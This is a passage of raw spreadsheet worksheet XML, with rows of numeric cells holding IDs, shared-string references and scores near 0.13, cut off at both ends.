        <v>19713.0</v>
      </c>
      <c r="B8299" s="2">
        <v>5.6555824E7</v>
      </c>
      <c r="C8299" s="2" t="s">
        <v>7890</v>
      </c>
      <c r="D8299" s="2">
        <v>1.0</v>
      </c>
      <c r="E8299" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8299" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="8300" ht="15.75" customHeight="1">
      <c r="A8300" s="1">
        <v>2642.0</v>
      </c>
      <c r="B8300" s="2">
        <v>3.4645072E7</v>
      </c>
      <c r="C8300" s="2" t="s">
        <v>7891</v>
      </c>
      <c r="D8300" s="2">
        <v>1.0</v>
      </c>
      <c r="E8300" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8300" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="8301" ht="15.75" customHeight="1">
      <c r="A8301" s="1">
        <v>3364.0</v>
      </c>
      <c r="B8301" s="2">
        <v>3.7895075E7</v>
      </c>
      <c r="C8301" s="2" t="s">
        <v>7892</v>
      </c>
      <c r="D8301" s="2">
        <v>1.0</v>
      </c>
      <c r="E8301" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8301" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="8302" ht="15.75" customHeight="1">
      <c r="A8302" s="1">
        <v>16004.0</v>
      </c>
      <c r="B8302" s="2">
        <v>4.4970479E7</v>
      </c>
      <c r="C8302" s="2" t="s">
        <v>7893</v>
      </c>
      <c r="D8302" s="2">
        <v>1.0</v>
      </c>
      <c r="E8302" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8302" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="8303" ht="15.75" customHeight="1">
      <c r="A8303" s="1">
        <v>18503.0</v>
      </c>
      <c r="B8303" s="2">
        <v>5.2950121E7</v>
      </c>
      <c r="C8303" s="2" t="s">
        <v>7894</v>
      </c>
      <c r="D8303" s="2">
        <v>1.0</v>
      </c>
      <c r="E8303" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8303" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="8304" ht="15.75" customHeight="1">
      <c r="A8304" s="1">
        <v>809.0</v>
      </c>
      <c r="B8304" s="2">
        <v>2.1356531E7</v>
      </c>
      <c r="C8304" s="2" t="s">
        <v>7895</v>
      </c>
      <c r="D8304" s="2">
        <v>1.0</v>
      </c>
      <c r="E8304" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8304" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8305" ht="15.75" customHeight="1">
      <c r="A8305" s="1">
        <v>882.0</v>
      </c>
      <c r="B8305" s="2">
        <v>2.195675E7</v>
      </c>
      <c r="C8305" s="2" t="s">
        <v>7896</v>
      </c>
      <c r="D8305" s="2">
        <v>1.0</v>
      </c>
      <c r="E8305" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8305" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8306" ht="15.75" customHeight="1">
      <c r="A8306" s="1">
        <v>1057.0</v>
      </c>
      <c r="B8306" s="2">
        <v>2.3446584E7</v>
      </c>
      <c r="C8306" s="2" t="s">
        <v>7897</v>
      </c>
      <c r="D8306" s="2">
        <v>1.0</v>
      </c>
      <c r="E8306" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8306" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8307" ht="15.75" customHeight="1">
      <c r="A8307" s="1">
        <v>1901.0</v>
      </c>
      <c r="B8307" s="2">
        <v>2.9938829E7</v>
      </c>
      <c r="C8307" s="2" t="s">
        <v>7898</v>
      </c>
      <c r="D8307" s="2">
        <v>1.0</v>
      </c>
      <c r="E8307" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8307" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8308" ht="15.75" customHeight="1">
      <c r="A8308" s="1">
        <v>1971.0</v>
      </c>
      <c r="B8308" s="2">
        <v>3.0400129E7</v>
      </c>
      <c r="C8308" s="2" t="s">
        <v>7899</v>
      </c>
      <c r="D8308" s="2">
        <v>1.0</v>
      </c>
      <c r="E8308" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8308" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8309" ht="15.75" customHeight="1">
      <c r="A8309" s="1">
        <v>2074.0</v>
      </c>
      <c r="B8309" s="2">
        <v>3.1127149E7</v>
      </c>
      <c r="C8309" s="2" t="s">
        <v>7900</v>
      </c>
      <c r="D8309" s="2">
        <v>1.0</v>
      </c>
      <c r="E8309" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8309" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8310" ht="15.75" customHeight="1">
      <c r="A8310" s="1">
        <v>2275.0</v>
      </c>
      <c r="B8310" s="2">
        <v>3.2527615E7</v>
      </c>
      <c r="C8310" s="2" t="s">
        <v>7901</v>
      </c>
      <c r="D8310" s="2">
        <v>1.0</v>
      </c>
      <c r="E8310" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8310" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8311" ht="15.75" customHeight="1">
      <c r="A8311" s="1">
        <v>2504.0</v>
      </c>
      <c r="B8311" s="2">
        <v>3.3941505E7</v>
      </c>
      <c r="C8311" s="2" t="s">
        <v>7902</v>
      </c>
      <c r="D8311" s="2">
        <v>1.0</v>
      </c>
      <c r="E8311" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8311" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8312" ht="15.75" customHeight="1">
      <c r="A8312" s="1">
        <v>2555.0</v>
      </c>
      <c r="B8312" s="2">
        <v>3.4166619E7</v>
      </c>
      <c r="C8312" s="2" t="s">
        <v>7903</v>
      </c>
      <c r="D8312" s="2">
        <v>1.0</v>
      </c>
      <c r="E8312" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8312" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8313" ht="15.75" customHeight="1">
      <c r="A8313" s="1">
        <v>2959.0</v>
      </c>
      <c r="B8313" s="2">
        <v>3.6024807E7</v>
      </c>
      <c r="C8313" s="2" t="s">
        <v>7904</v>
      </c>
      <c r="D8313" s="2">
        <v>1.0</v>
      </c>
      <c r="E8313" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8313" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8314" ht="15.75" customHeight="1">
      <c r="A8314" s="1">
        <v>3136.0</v>
      </c>
      <c r="B8314" s="2">
        <v>3.6880535E7</v>
      </c>
      <c r="C8314" s="2" t="s">
        <v>7905</v>
      </c>
      <c r="D8314" s="2">
        <v>1.0</v>
      </c>
      <c r="E8314" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8314" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8315" ht="15.75" customHeight="1">
      <c r="A8315" s="1">
        <v>3137.0</v>
      </c>
      <c r="B8315" s="2">
        <v>3.6899719E7</v>
      </c>
      <c r="C8315" s="2" t="s">
        <v>7906</v>
      </c>
      <c r="D8315" s="2">
        <v>1.0</v>
      </c>
      <c r="E8315" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8315" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8316" ht="15.75" customHeight="1">
      <c r="A8316" s="1">
        <v>3829.0</v>
      </c>
      <c r="B8316" s="2">
        <v>4.0156905E7</v>
      </c>
      <c r="C8316" s="2" t="s">
        <v>7907</v>
      </c>
      <c r="D8316" s="2">
        <v>1.0</v>
      </c>
      <c r="E8316" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8316" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8317" ht="15.75" customHeight="1">
      <c r="A8317" s="1">
        <v>3974.0</v>
      </c>
      <c r="B8317" s="2">
        <v>4.0811222E7</v>
      </c>
      <c r="C8317" s="2" t="s">
        <v>7908</v>
      </c>
      <c r="D8317" s="2">
        <v>1.0</v>
      </c>
      <c r="E8317" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8317" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8318" ht="15.75" customHeight="1">
      <c r="A8318" s="1">
        <v>4484.0</v>
      </c>
      <c r="B8318" s="2">
        <v>4.2508505E7</v>
      </c>
      <c r="C8318" s="2" t="s">
        <v>7909</v>
      </c>
      <c r="D8318" s="2">
        <v>1.0</v>
      </c>
      <c r="E8318" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8318" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8319" ht="15.75" customHeight="1">
      <c r="A8319" s="1">
        <v>5969.0</v>
      </c>
      <c r="B8319" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C8319" s="2" t="s">
        <v>7910</v>
      </c>
      <c r="D8319" s="2">
        <v>1.0</v>
      </c>
      <c r="E8319" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8319" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8320" ht="15.75" customHeight="1">
      <c r="A8320" s="1">
        <v>6392.0</v>
      </c>
      <c r="B8320" s="2">
        <v>4.8461609E7</v>
      </c>
      <c r="C8320" s="2" t="s">
        <v>7911</v>
      </c>
      <c r="D8320" s="2">
        <v>1.0</v>
      </c>
      <c r="E8320" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8320" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8321" ht="15.75" customHeight="1">
      <c r="A8321" s="1">
        <v>6740.0</v>
      </c>
      <c r="B8321" s="2">
        <v>4.9353277E7</v>
      </c>
      <c r="C8321" s="2" t="s">
        <v>7912</v>
      </c>
      <c r="D8321" s="2">
        <v>1.0</v>
      </c>
      <c r="E8321" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8321" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8322" ht="15.75" customHeight="1">
      <c r="A8322" s="1">
        <v>8046.0</v>
      </c>
      <c r="B8322" s="2">
        <v>5.2845408E7</v>
      </c>
      <c r="C8322" s="2" t="s">
        <v>7913</v>
      </c>
      <c r="D8322" s="2">
        <v>1.0</v>
      </c>
      <c r="E8322" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8322" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8323" ht="15.75" customHeight="1">
      <c r="A8323" s="1">
        <v>8549.0</v>
      </c>
      <c r="B8323" s="2">
        <v>5.414687E7</v>
      </c>
      <c r="C8323" s="2" t="s">
        <v>7914</v>
      </c>
      <c r="D8323" s="2">
        <v>1.0</v>
      </c>
      <c r="E8323" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8323" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8324" ht="15.75" customHeight="1">
      <c r="A8324" s="1">
        <v>8567.0</v>
      </c>
      <c r="B8324" s="2">
        <v>5.4185168E7</v>
      </c>
      <c r="C8324" s="2" t="s">
        <v>7915</v>
      </c>
      <c r="D8324" s="2">
        <v>1.0</v>
      </c>
      <c r="E8324" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8324" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8325" ht="15.75" customHeight="1">
      <c r="A8325" s="1">
        <v>8677.0</v>
      </c>
      <c r="B8325" s="2">
        <v>5.4389314E7</v>
      </c>
      <c r="C8325" s="2" t="s">
        <v>7916</v>
      </c>
      <c r="D8325" s="2">
        <v>1.0</v>
      </c>
      <c r="E8325" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8325" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8326" ht="15.75" customHeight="1">
      <c r="A8326" s="1">
        <v>9059.0</v>
      </c>
      <c r="B8326" s="2">
        <v>5.5103122E7</v>
      </c>
      <c r="C8326" s="2" t="s">
        <v>7917</v>
      </c>
      <c r="D8326" s="2">
        <v>1.0</v>
      </c>
      <c r="E8326" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8326" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8327" ht="15.75" customHeight="1">
      <c r="A8327" s="1">
        <v>9444.0</v>
      </c>
      <c r="B8327" s="2">
        <v>5.5816959E7</v>
      </c>
      <c r="C8327" s="2" t="s">
        <v>7918</v>
      </c>
      <c r="D8327" s="2">
        <v>1.0</v>
      </c>
      <c r="E8327" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8327" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8328" ht="15.75" customHeight="1">
      <c r="A8328" s="1">
        <v>10292.0</v>
      </c>
      <c r="B8328" s="2">
        <v>5.7645408E7</v>
      </c>
      <c r="C8328" s="2" t="s">
        <v>7919</v>
      </c>
      <c r="D8328" s="2">
        <v>1.0</v>
      </c>
      <c r="E8328" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8328" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8329" ht="15.75" customHeight="1">
      <c r="A8329" s="1">
        <v>11354.0</v>
      </c>
      <c r="B8329" s="2">
        <v>2.1298326E7</v>
      </c>
      <c r="C8329" s="2" t="s">
        <v>7920</v>
      </c>
      <c r="D8329" s="2">
        <v>1.0</v>
      </c>
      <c r="E8329" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8329" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8330" ht="15.75" customHeight="1">
      <c r="A8330" s="1">
        <v>11555.0</v>
      </c>
      <c r="B8330" s="2">
        <v>2.2699631E7</v>
      </c>
      <c r="C8330" s="2" t="s">
        <v>7921</v>
      </c>
      <c r="D8330" s="2">
        <v>1.0</v>
      </c>
      <c r="E8330" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8330" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8331" ht="15.75" customHeight="1">
      <c r="A8331" s="1">
        <v>11732.0</v>
      </c>
      <c r="B8331" s="2">
        <v>2.3989209E7</v>
      </c>
      <c r="C8331" s="2" t="s">
        <v>7922</v>
      </c>
      <c r="D8331" s="2">
        <v>1.0</v>
      </c>
      <c r="E8331" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8331" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8332" ht="15.75" customHeight="1">
      <c r="A8332" s="1">
        <v>11753.0</v>
      </c>
      <c r="B8332" s="2">
        <v>2.412659E7</v>
      </c>
      <c r="C8332" s="2" t="s">
        <v>7923</v>
      </c>
      <c r="D8332" s="2">
        <v>1.0</v>
      </c>
      <c r="E8332" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8332" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8333" ht="15.75" customHeight="1">
      <c r="A8333" s="1">
        <v>11844.0</v>
      </c>
      <c r="B8333" s="2">
        <v>2.4715438E7</v>
      </c>
      <c r="C8333" s="2" t="s">
        <v>7924</v>
      </c>
      <c r="D8333" s="2">
        <v>1.0</v>
      </c>
      <c r="E8333" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8333" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8334" ht="15.75" customHeight="1">
      <c r="A8334" s="1">
        <v>12569.0</v>
      </c>
      <c r="B8334" s="2">
        <v>2.9973914E7</v>
      </c>
      <c r="C8334" s="2" t="s">
        <v>7925</v>
      </c>
      <c r="D8334" s="2">
        <v>1.0</v>
      </c>
      <c r="E8334" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8334" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8335" ht="15.75" customHeight="1">
      <c r="A8335" s="1">
        <v>12598.0</v>
      </c>
      <c r="B8335" s="2">
        <v>3.0078768E7</v>
      </c>
      <c r="C8335" s="2" t="s">
        <v>7926</v>
      </c>
      <c r="D8335" s="2">
        <v>1.0</v>
      </c>
      <c r="E8335" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8335" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8336" ht="15.75" customHeight="1">
      <c r="A8336" s="1">
        <v>14117.0</v>
      </c>
      <c r="B8336" s="2">
        <v>3.7794172E7</v>
      </c>
      <c r="C8336" s="2" t="s">
        <v>7927</v>
      </c>
      <c r="D8336" s="2">
        <v>1.0</v>
      </c>
      <c r="E8336" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8336" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8337" ht="15.75" customHeight="1">
      <c r="A8337" s="1">
        <v>14794.0</v>
      </c>
      <c r="B8337" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C8337" s="2" t="s">
        <v>7928</v>
      </c>
      <c r="D8337" s="2">
        <v>1.0</v>
      </c>
      <c r="E8337" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8337" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8338" ht="15.75" customHeight="1">
      <c r="A8338" s="1">
        <v>15311.0</v>
      </c>
      <c r="B8338" s="2">
        <v>4.2499425E7</v>
      </c>
      <c r="C8338" s="2" t="s">
        <v>7929</v>
      </c>
      <c r="D8338" s="2">
        <v>1.0</v>
      </c>
      <c r="E8338" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8338" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8339" ht="15.75" customHeight="1">
      <c r="A8339" s="1">
        <v>15551.0</v>
      </c>
      <c r="B8339" s="2">
        <v>4.3398978E7</v>
      </c>
      <c r="C8339" s="2" t="s">
        <v>7930</v>
      </c>
      <c r="D8339" s="2">
        <v>1.0</v>
      </c>
      <c r="E8339" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8339" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8340" ht="15.75" customHeight="1">
      <c r="A8340" s="1">
        <v>15621.0</v>
      </c>
      <c r="B8340" s="2">
        <v>4.3555119E7</v>
      </c>
      <c r="C8340" s="2" t="s">
        <v>7931</v>
      </c>
      <c r="D8340" s="2">
        <v>1.0</v>
      </c>
      <c r="E8340" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8340" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8341" ht="15.75" customHeight="1">
      <c r="A8341" s="1">
        <v>16257.0</v>
      </c>
      <c r="B8341" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C8341" s="2" t="s">
        <v>7932</v>
      </c>
      <c r="D8341" s="2">
        <v>1.0</v>
      </c>
      <c r="E8341" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8341" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8342" ht="15.75" customHeight="1">
      <c r="A8342" s="1">
        <v>16524.0</v>
      </c>
      <c r="B8342" s="2">
        <v>4.6679944E7</v>
      </c>
      <c r="C8342" s="2" t="s">
        <v>7933</v>
      </c>
      <c r="D8342" s="2">
        <v>1.0</v>
      </c>
      <c r="E8342" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8342" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8343" ht="15.75" customHeight="1">
      <c r="A8343" s="1">
        <v>16602.0</v>
      </c>
      <c r="B8343" s="2">
        <v>4.7028766E7</v>
      </c>
      <c r="C8343" s="2" t="s">
        <v>7934</v>
      </c>
      <c r="D8343" s="2">
        <v>1.0</v>
      </c>
      <c r="E8343" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8343" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8344" ht="15.75" customHeight="1">
      <c r="A8344" s="1">
        <v>17546.0</v>
      </c>
      <c r="B8344" s="2">
        <v>5.0157306E7</v>
      </c>
      <c r="C8344" s="2" t="s">
        <v>7935</v>
      </c>
      <c r="D8344" s="2">
        <v>1.0</v>
      </c>
      <c r="E8344" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8344" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8345" ht="15.75" customHeight="1">
      <c r="A8345" s="1">
        <v>17642.0</v>
      </c>
      <c r="B8345" s="2">
        <v>5.0403755E7</v>
      </c>
      <c r="C8345" s="2" t="s">
        <v>7936</v>
      </c>
      <c r="D8345" s="2">
        <v>1.0</v>
      </c>
      <c r="E8345" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8345" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8346" ht="15.75" customHeight="1">
      <c r="A8346" s="1">
        <v>18424.0</v>
      </c>
      <c r="B8346" s="2">
        <v>5.2716E7</v>
      </c>
      <c r="C8346" s="2" t="s">
        <v>7937</v>
      </c>
      <c r="D8346" s="2">
        <v>1.0</v>
      </c>
      <c r="E8346" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8346" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8347" ht="15.75" customHeight="1">
      <c r="A8347" s="1">
        <v>19525.0</v>
      </c>
      <c r="B8347" s="2">
        <v>5.5974633E7</v>
      </c>
      <c r="C8347" s="2" t="s">
        <v>7938</v>
      </c>
      <c r="D8347" s="2">
        <v>1.0</v>
      </c>
      <c r="E8347" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8347" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8348" ht="15.75" customHeight="1">
      <c r="A8348" s="1">
        <v>21450.0</v>
      </c>
      <c r="B8348" s="2">
        <v>2.261569E7</v>
      </c>
      <c r="C8348" s="2" t="s">
        <v>7939</v>
      </c>
      <c r="D8348" s="2">
        <v>1.0</v>
      </c>
      <c r="E8348" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8348" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8349" ht="15.75" customHeight="1">
      <c r="A8349" s="1">
        <v>29324.0</v>
      </c>
      <c r="B8349" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C8349" s="2" t="s">
        <v>7940</v>
      </c>
      <c r="D8349" s="2">
        <v>1.0</v>
      </c>
      <c r="E8349" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8349" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8350" ht="15.75" customHeight="1">
      <c r="A8350" s="1">
        <v>31488.0</v>
      </c>
      <c r="B8350" s="2">
        <v>5.0600573E7</v>
      </c>
      <c r="C8350" s="2" t="s">
        <v>7941</v>
      </c>
      <c r="D8350" s="2">
        <v>1.0</v>
      </c>
      <c r="E8350" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8350" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8351" ht="15.75" customHeight="1">
      <c r="A8351" s="1">
        <v>32886.0</v>
      </c>
      <c r="B8351" s="2">
        <v>6356526.0</v>
      </c>
      <c r="C8351" s="2" t="s">
        <v>7942</v>
      </c>
      <c r="D8351" s="2">
        <v>1.0</v>
      </c>
      <c r="E8351" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8351" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8352" ht="15.75" customHeight="1">
      <c r="A8352" s="1">
        <v>33886.0</v>
      </c>
      <c r="B8352" s="2">
        <v>9168470.0</v>
      </c>
      <c r="C8352" s="2" t="s">
        <v>7861</v>
      </c>
      <c r="D8352" s="2">
        <v>1.0</v>
      </c>
      <c r="E8352" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8352" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="8353" ht="15.75" customHeight="1">
      <c r="A8353" s="1">
        <v>1910.0</v>
      </c>
      <c r="B8353" s="2">
        <v>3.0008285E7</v>
      </c>
      <c r="C8353" s="2" t="s">
        <v>7943</v>
      </c>
      <c r="D8353" s="2">
        <v>1.0</v>
      </c>
      <c r="E8353" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8353" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="8354" ht="15.75" customHeight="1">
      <c r="A8354" s="1">
        <v>30539.0</v>
      </c>
      <c r="B8354" s="2">
        <v>4.0568949E7</v>
      </c>
      <c r="C8354" s="2" t="s">
        <v>7944</v>
      </c>
      <c r="D8354" s="2">
        <v>1.0</v>
      </c>
      <c r="E8354" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8354" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="8355" ht="15.75" customHeight="1">
      <c r="A8355" s="1">
        <v>14320.0</v>
      </c>
      <c r="B8355" s="2">
        <v>3.8705927E7</v>
      </c>
      <c r="C8355" s="2" t="s">
        <v>7945</v>
      </c>
      <c r="D8355" s="2">
        <v>1.0</v>
      </c>
      <c r="E8355" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8355" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="8356" ht="15.75" customHeight="1">
      <c r="A8356" s="1">
        <v>6051.0</v>
      </c>
      <c r="B8356" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C8356" s="2" t="s">
        <v>7946</v>
      </c>
      <c r="D8356" s="2">
        <v>1.0</v>
      </c>
      <c r="E8356" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8356" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="8357" ht="15.75" customHeight="1">
      <c r="A8357" s="1">
        <v>16760.0</v>
      </c>
      <c r="B8357" s="2">
        <v>4.7602779E7</v>
      </c>
      <c r="C8357" s="2" t="s">
        <v>7947</v>
      </c>
      <c r="D8357" s="2">
        <v>1.0</v>
      </c>
      <c r="E8357" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8357" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="8358" ht="15.75" customHeight="1">
      <c r="A8358" s="1">
        <v>27011.0</v>
      </c>
      <c r="B8358" s="2">
        <v>1.9998328E7</v>
      </c>
      <c r="C8358" s="2" t="s">
        <v>7948</v>
      </c>
      <c r="D8358" s="2">
        <v>1.0</v>
      </c>
      <c r="E8358" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8358" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="8359" ht="15.75" customHeight="1">
      <c r="A8359" s="1">
        <v>33140.0</v>
      </c>
      <c r="B8359" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C8359" s="2" t="s">
        <v>7949</v>
      </c>
      <c r="D8359" s="2">
        <v>1.0</v>
      </c>
      <c r="E8359" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8359" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="8360" ht="15.75" customHeight="1">
      <c r="A8360" s="1">
        <v>33942.0</v>
      </c>
      <c r="B8360" s="2">
        <v>9290233.0</v>
      </c>
      <c r="C8360" s="2" t="s">
        <v>7950</v>
      </c>
      <c r="D8360" s="2">
        <v>1.0</v>
      </c>
      <c r="E8360" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8360" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="8361" ht="15.75" customHeight="1">
      <c r="A8361" s="1">
        <v>1230.0</v>
      </c>
      <c r="B8361" s="2">
        <v>2.5014749E7</v>
      </c>
      <c r="C8361" s="2" t="s">
        <v>7951</v>
      </c>
      <c r="D8361" s="2">
        <v>1.0</v>
      </c>
      <c r="E8361" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8361" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8362" ht="15.75" customHeight="1">
      <c r="A8362" s="1">
        <v>1242.0</v>
      </c>
      <c r="B8362" s="2">
        <v>2.5096587E7</v>
      </c>
      <c r="C8362" s="2" t="s">
        <v>7952</v>
      </c>
      <c r="D8362" s="2">
        <v>1.0</v>
      </c>
      <c r="E8362" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8362" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8363" ht="15.75" customHeight="1">
      <c r="A8363" s="1">
        <v>1693.0</v>
      </c>
      <c r="B8363" s="2">
        <v>2.8497546E7</v>
      </c>
      <c r="C8363" s="2" t="s">
        <v>7953</v>
      </c>
      <c r="D8363" s="2">
        <v>1.0</v>
      </c>
      <c r="E8363" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8363" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8364" ht="15.75" customHeight="1">
      <c r="A8364" s="1">
        <v>7779.0</v>
      </c>
      <c r="B8364" s="2">
        <v>5.2174477E7</v>
      </c>
      <c r="C8364" s="2" t="s">
        <v>7954</v>
      </c>
      <c r="D8364" s="2">
        <v>1.0</v>
      </c>
      <c r="E8364" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8364" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8365" ht="15.75" customHeight="1">
      <c r="A8365" s="1">
        <v>11810.0</v>
      </c>
      <c r="B8365" s="2">
        <v>2.4480709E7</v>
      </c>
      <c r="C8365" s="2" t="s">
        <v>7955</v>
      </c>
      <c r="D8365" s="2">
        <v>1.0</v>
      </c>
      <c r="E8365" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8365" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8366" ht="15.75" customHeight="1">
      <c r="A8366" s="1">
